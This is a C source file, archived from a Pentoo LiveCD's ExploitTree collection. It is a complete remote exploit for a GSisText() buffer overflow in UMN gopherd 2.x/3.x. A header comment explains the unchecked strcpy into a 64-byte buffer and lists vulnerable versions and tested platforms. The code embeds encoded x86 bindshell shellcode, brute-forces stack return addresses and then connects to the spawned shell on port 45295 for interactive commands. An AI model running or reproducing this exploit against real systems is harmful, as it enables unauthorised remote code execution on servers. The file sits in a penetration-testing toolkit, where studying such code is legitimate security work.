home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / proxy / gopherd / xgopherd2k3-view.c

< prev

Wrap

C/C++ Source or Header  |  2005-02-12  |  11KB  |  268 lines

---

1.  
2. /*[ UMN gopherd[2.x.x/3.x.x]: remote GSisText()/view buffer overflow. ]*
3.  *                                                                     *
4.  * by: vade79/v9 v9@fakehalo.deadpig.org (fakehalo/realhalo)           *
5.  *                                                                     *
6.  * three years since last audit, code is a little more secure.  but,   *
7.  * still found a few potentially exploitable situations.  this         *
8.  * exploits the GSisText() object function in gopherd.  the function   *
9.  * is used in determining view-type.  the function does not check the  *
10.  * length of the string, which is copied into a temporary 64 byte      *
11.  * buffer.  an example would look like this(including where to put the *
12.  * shellcode at):                                                      *
13.  *                                                                     *
14.  * "g\t+<long string>\t1\n<shellcode(256 character max)>\n"            *
15.  *                                                                     *
16.  * to exploit this, the request must start with a h, 0, 4, 5, 9, s, I, *
17.  * or g.  followed by a <tab>+<long string>.  to have a place to put   *
18.  * the shellcode, i appeneded a <tab>1, which makes gopherd wait for   *
19.  * another line before actually doing the overflow.                    *
20.  *                                                                     *
21.  * requirements(general):                                              *
22.  *  none.  no option to disable this, hard-coded upon compile.         *
23.  *                                                                     *
24.  * requirements(for this exploit):                                     *
25.  *  the server must be running linux/x86(what i made the exploit for). *
26.  *  gopherd must be started in the root directory "/", running with    *
27.  *  the -c command line option, or started as non-root.  any of those  *
28.  *  three situations will allow for successful exploitation.  this     *
29.  *  does not mean it is impossible to exploit otherwise.  but, gopherd *
30.  *  will be in a chroot()'d state.  and, as of the 2.4 kernel series,  *
31.  *  i have seen no such way to break chroot.  if it is desired to      *
32.  *  still run code, even in a limited environment, simply change the   *
33.  *  shellcode to your likings.                                         *
34.  *                                                                     *
35.  * bug location(gopher-3.0.5/object/GSgopherobj.c):                    *
36.  *  2088:boolean                                                       *
37.  *  2089:GSisText(GopherObj *gs, char *view)                           *
38.  *  2090:{                                                             *
39.  *  ...                                                                *
40.  *  2106:char viewstowage[64], *cp;                                    *
41.  *  2108:strcpy(viewstowage, view);                                    *
42.  *                                                                     *
43.  * vulnerable versions:                                                *
44.  *  v3.0.5, v3.0.4, v3.0.3, v3.0.2, v3.0.1, v3.0.0(-1),                *
45.  *  v2.3.1. (patch level 0 through 15/all 2.3.1 versions)              *
46.  *  (it is assumed versions before 2.3.1 are vulnerable as well)       *
47.  *                                                                     *
48.  * tested on platforms(with no code changes/offsets):                  *
49.  *  RedHat7.1, 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686             *
50.  *  Mandrake9.1, 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003 i686   *
51.  *  (tested on both v3.0.5, and v2.3.1 sources / no changes)           *
52.  *                                                                     *
53.  * example usage:                                                      *
54.  *  # cc xgopherd2k3-view.c -o xgopherd2k3-view                        *
55.  *  # ./xgopherd2k3-view localhost                                     *
56.  *  [*] UMN gopherd[2.x.x/3.x.x]: remote buffer overflow exploit.      *
57.  *  [*] "UMN gopherd remote GSisText()/view buffer overflow"           *
58.  *  [*] by: vade79/v9 v9@fakehalo.deadpig.org (fakehalo)               *
59.  *                                                                     *
60.  *  [*] target: localhost:70 - brute: 0xbfffe000-0xbfffffff            *
61.  *                                                                     *
62.  *  (. = 29 byte offset): ............................................ *
63.  *  .................................................................. *
64.  *  ................................................(hit shellcode!)   *
65.  *                                                                     *
66.  *  Linux localhost.localdomain 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 200$ *
67.  *  uid=13(gopher) gid=30(gopher) groups=0(root),1(bin),2(daemon),3(s$ *
68.  ***********************************************************************/
69. #include <stdio.h>
70. #include <stdlib.h>
71. #include <string.h>
72. #include <strings.h>
73. #include <signal.h>
74. #include <unistd.h>
75. #include <netdb.h>
76. #include <sys/socket.h>
77. #include <sys/types.h>
78. #include <sys/time.h>
79. #include <netinet/in.h>
80. #include <arpa/inet.h>
81.  
82. /* using brute force method, don't change values.                 */
83. #define CODESIZE 256 /* big as it gets, or will fail.             */
84. #define EIPSIZE 128 /* 64 byte buffer, little overboard. :)       */
85. #define BASEADDR 0xbfffe000 /* starting address, should be ok.    */
86. #define ENDADDR 0xbfffffff /* address to stop at.                 */
87. #define TIMEOUT 10 /* connection timeout. (general)               */
88.  
89. /* globals. */
90. static char x86_exec[]= /* bindshell(45295)&, netric/S-poly. */
91.  "\x57\x5f\xeb\x11\x5e\x31\xc9\xb1\xc8\x80\x44\x0e\xff\x2b\x49"
92.  "\x41\x49\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x06\x95\x06\xb0"
93.  "\x06\x9e\x26\x86\xdb\x26\x86\xd6\x26\x86\xd7\x26\x5e\xb6\x88"
94.  "\xd6\x85\x3b\xa2\x55\x5e\x96\x06\x95\x06\xb0\x25\x25\x25\x3b"
95.  "\x3d\x85\xc4\x88\xd7\x3b\x28\x5e\xb7\x88\xe5\x28\x88\xd7\x27"
96.  "\x26\x5e\x9f\x5e\xb6\x85\x3b\xa2\x55\x06\xb0\x0e\x98\x49\xda"
97.  "\x06\x95\x15\xa2\x55\x06\x95\x25\x27\x5e\xb6\x88\xd9\x85\x3b"
98.  "\xa2\x55\x5e\xac\x06\x95\x06\xb0\x06\x9e\x88\xe6\x86\xd6\x85"
99.  "\x05\xa2\x55\x06\x95\x06\xb0\x25\x25\x2c\x5e\xb6\x88\xda\x85"
100.  "\x3b\xa2\x55\x5e\x9b\x06\x95\x06\xb0\x85\xd7\xa2\x55\x0e\x98"
101.  "\x4a\x15\x06\x95\x5e\xd0\x85\xdb\xa2\x55\x06\x95\x06\x9e\x5e"
102.  "\xc8\x85\x14\xa2\x55\x06\x95\x16\x85\x14\xa2\x55\x06\x95\x16"
103.  "\x85\x14\xa2\x55\x06\x95\x25\x3d\x04\x04\x48\x3d\x3d\x04\x37"
104.  "\x3e\x43\x5e\xb8\x60\x29\xf9\xdd\x25\x28\x5e\xb6\x85\xe0\xa2"
105.  "\x55\x06\x95\x15\xa2\x55\x06\x95\x5e\xc8\x85\xdb\xa2\x55\xc0"
106.  "\x6e";
107.  
108. /* functions. */
109. char *geteip(unsigned int);
110. char *getcode(void);
111. unsigned short gopher_connect(char *,unsigned short,
112. unsigned int);
113. void getshell(char *,unsigned short);
114. void printe(char *,short);
115.  
116. /* signal handlers. */
117. void sig_ctrlc(){printe("aborted",1);}
118. void sig_alarm(){printe("alarm/timeout hit",1);}
119.  
120. /* begin. */
121. int main(int argc,char **argv){
122.  unsigned short gopher_port=70; /* default. */
123.  unsigned int offset=0,i=0;
124.  char *gopher_host;
125.  printf("[*] UMN gopherd[2.x.x/3.x.x]: remote buffer o"
126.  "verflow exploit.\n[*] \"UMN gopherd remote GSisText("
127.  ")/view buffer overflow\"\n[*] by: vade79/v9 v9@fakeh"
128.  "alo.deadpig.org (fakehalo)\n\n");
129.  if(argc<2){
130.   printf("[!] syntax: %s <hostname[:port]>\n\n",argv[0]);
131.   exit(1);
132.  }
133.  if(!(gopher_host=(char *)strdup(argv[1])))
134.   printe("main(): allocating memory failed",1);
135.  for(i=0;i<strlen(gopher_host);i++)
136.   if(gopher_host[i]==':')
137.    gopher_host[i]=0x0;
138.  if(index(argv[1],':'))
139.   gopher_port=atoi((char *)index(argv[1],':')+1);
140.  if(!gopher_port)
141.   gopher_port=70;
142.  printf("[*] target: %s:%d - brute: 0x%.8x-0x%.8x\n\n",
143.  gopher_host,gopher_port,BASEADDR,ENDADDR);
144.  signal(SIGINT,sig_ctrlc);
145.  signal(SIGALRM,sig_alarm);
146.  fprintf(stderr,"(. = 29 byte offset): ");
147.  for(offset=0;(BASEADDR+offset)<ENDADDR;offset+=29){
148.   fprintf(stderr,(gopher_connect(gopher_host,gopher_port,
149.   offset)?"!":"."));
150.   getshell(gopher_host,45295); /* defined in shellcode. */
151.  }
152.  fprintf(stderr,"(brute force limit hit)\n");
153.  exit(0);
154. }
155. char *geteip(unsigned int offset){
156.  unsigned int i=0;
157.  char *buf;
158.  if(!(buf=(char *)malloc(EIPSIZE+1)))
159.   printe("ftpd_read(): allocating memory failed.",1);
160.  memset(buf,0x0,EIPSIZE+1);
161.  for(i=0;i<EIPSIZE;i+=4){*(long *)&buf[i]=(BASEADDR+offset);}  
162.  return(buf);
163. }
164. char *getcode(void){
165.  char *buf;
166.  if(!(buf=(char *)malloc(CODESIZE+1)))
167.   printe("getcode(): allocating memory failed",1);
168.  memset(buf,0x90,(CODESIZE-strlen(x86_exec)));
169.  memcpy(buf+(CODESIZE-strlen(x86_exec)),x86_exec,
170.  strlen(x86_exec));
171.  return(buf);
172. }
173. unsigned short gopher_connect(char *hostname,
174. unsigned short port,unsigned int offset){
175.  int sock;
176.  struct hostent *t;
177.  struct sockaddr_in s;
178.  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
179.  s.sin_family=AF_INET;
180.  s.sin_port=htons(port);
181.  if((s.sin_addr.s_addr=inet_addr(hostname))){
182.   if(!(t=gethostbyname(hostname))){
183.    close(sock);
184.    return(1);
185.   }
186.   memcpy((char*)&s.sin_addr,(char*)t->h_addr, 
187.   sizeof(s.sin_addr));
188.  }
189.  signal(SIGALRM,sig_alarm);
190.  alarm(TIMEOUT);
191.  if(connect(sock,(struct sockaddr *)&s,sizeof(s))){
192.   alarm(0);
193.   close(sock);
194.   return(1);
195.  }
196.  alarm(0);
197.  usleep(500000); /* had problems, without a delay here. */
198.  /* the exploit itself. */
199.  dprintf(sock,"g\t+%s\t1\n",geteip(offset)); /* 64 bytes. */
200.  dprintf(sock,"%s\n",getcode()); /* 256 bytes room.       */
201.  usleep(500000);
202.  close(sock); /* done. */
203.  return(0);
204. }
205. /* same getshell() routine, a little modded for brute. */
206. void getshell(char *hostname,unsigned short port){
207.  int sock,r;
208.  fd_set fds;
209.  char buf[4096+1];
210.  struct hostent *he;
211.  struct sockaddr_in sa;
212.  if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)  
213.   return;
214.  sa.sin_family=AF_INET;
215.  if((sa.sin_addr.s_addr=inet_addr(hostname))){
216.   if(!(he=gethostbyname(hostname))){
217.    close(sock);
218.    return;
219.   }
220.   memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
221.   sizeof(sa.sin_addr));
222.  }
223.  sa.sin_port=htons(port);
224.  signal(SIGALRM,sig_alarm);
225.  alarm(TIMEOUT);
226.  if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
227.   alarm(0);
228.   close(sock);
229.   return;
230.  }
231.  alarm(0);
232.  fprintf(stderr,"(hit shellcode!)\n\n");
233.  signal(SIGINT,SIG_IGN);
234.  write(sock,"uname -a;id\n",13);
235.  while(1){   
236.   FD_ZERO(&fds);
237.   FD_SET(0,&fds);
238.   FD_SET(sock,&fds);
239.   if(select(sock+1,&fds,0,0,0)<1){
240.    printe("getshell(): select() failed",0);
241.    return;
242.   }
243.   if(FD_ISSET(0,&fds)){
244.    if((r=read(0,buf,4096))<1){
245.     printe("getshell(): read() failed",0);   
246.     return;
247.    }
248.    if(write(sock,buf,r)!=r){
249.     printe("getshell(): write() failed",0);
250.     return;
251.    }
252.   } 
253.   if(FD_ISSET(sock,&fds)){ 
254.    if((r=read(sock,buf,4096))<1)
255.     exit(0);
256.    write(1,buf,r);
257.   }
258.  }
259.  close(sock);
260.  return;
261. }
262. void printe(char *err,short e){
263.  fprintf(stderr,"(error: %s)\n",err);
264.  if(e)
265.   exit(1);
266.  return;
267. }
268.